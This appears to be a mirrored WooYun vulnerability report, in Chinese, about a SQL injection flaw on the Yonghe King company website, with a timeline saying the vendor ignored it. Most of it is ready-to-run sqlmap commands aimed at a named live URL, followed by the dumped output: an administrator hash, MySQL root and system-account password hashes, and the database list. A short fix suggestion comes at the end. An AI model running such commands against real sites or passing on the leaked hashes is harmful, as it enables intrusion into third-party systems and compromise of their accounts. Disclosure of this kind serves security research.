乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-07: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-21: 厂商已经主动忽略漏洞,细节向公众公开
永和大王官网SQL注入 数据库信息全部泄露
新闻页面存在sql注入漏洞,下面的sqlmap命令可以获取数据库相关信息
python sqlmap.py -u "http://www.yonghe.com.cn/index.php/Index/newsdetail/id/33*" -D yonghe --tables --dumppython sqlmap.py -u "http://www.yonghe.com.cn/index.php/Index/newsdetail/id/33*" -f --banner --dbs --users --passwords
从yonghe表中可以获取到管理员信息
"[email protected]","b9fdf1d3d7057e7239845f0ad5985dc3","admin"
数据库信息
web application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS operating system: Linux Ubuntuback-end DBMS: active fingerprint: MySQL >= 5.5.0 banner parsing fingerprint: MySQL 5.5.34banner: '5.5.34-0ubuntu0.12.04.1'database management system users [8]:[*] ''@'AY140115163925310e5cZ'[*] ''@'localhost'[*] 'debian-sys-maint'@'localhost'[*] 'root'@'127.0.0.1'[*] 'root'@'::1'[*] 'root'@'AY140115163925310e5cZ'[*] 'root'@'localhost'[*] 'yonghe'@'localhost'database management system users password hashes:[*] debian-sys-maint [1]: password hash: *FE7932639B39CFBDF97D3296B3157D549AA0C24A[*] root [1]: password hash: *75DB42791C88045A1CAE037435527B1B5FED91D6[*] yonghe [1]: password hash: *9F4C215BAFC94F7E1EC9D3B4BFB054D5A55C0BE1available databases [9]:[*] information_schema[*] mysql[*] performance_schema[*] pinpaidashi[*] test[*] yhwechat_201404[*] yhwechat_201408[*] yhwechat_201501[*] yonghe
部分下载到的数据库记录
检查程序代码,对php$_GET变量转义后执行sql查询
未能联系到厂商或者厂商积极拒绝
漏洞Rank:8 (WooYun评价)